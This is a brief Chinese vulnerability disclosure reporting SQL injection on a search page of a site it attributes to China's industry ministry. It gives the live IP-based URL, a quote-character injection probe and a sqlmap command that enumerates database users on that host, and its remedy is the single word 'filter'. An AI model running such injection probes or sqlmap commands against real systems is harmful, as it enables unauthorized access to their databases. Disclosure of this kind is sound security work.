工业和信息化部某站SQL注入漏洞
http://219.239.97.51/chinacc/search2.asp?ClassID=&Field=&Keyword=1%27%22&page=2
sqlmap 跑一下:
sqlmap -u "http://219.239.97.51:80/chinacc/search2.asp?ClassID=&Field=&Keyword=1&page=2" --users
dbs:users:
修复方案:
过滤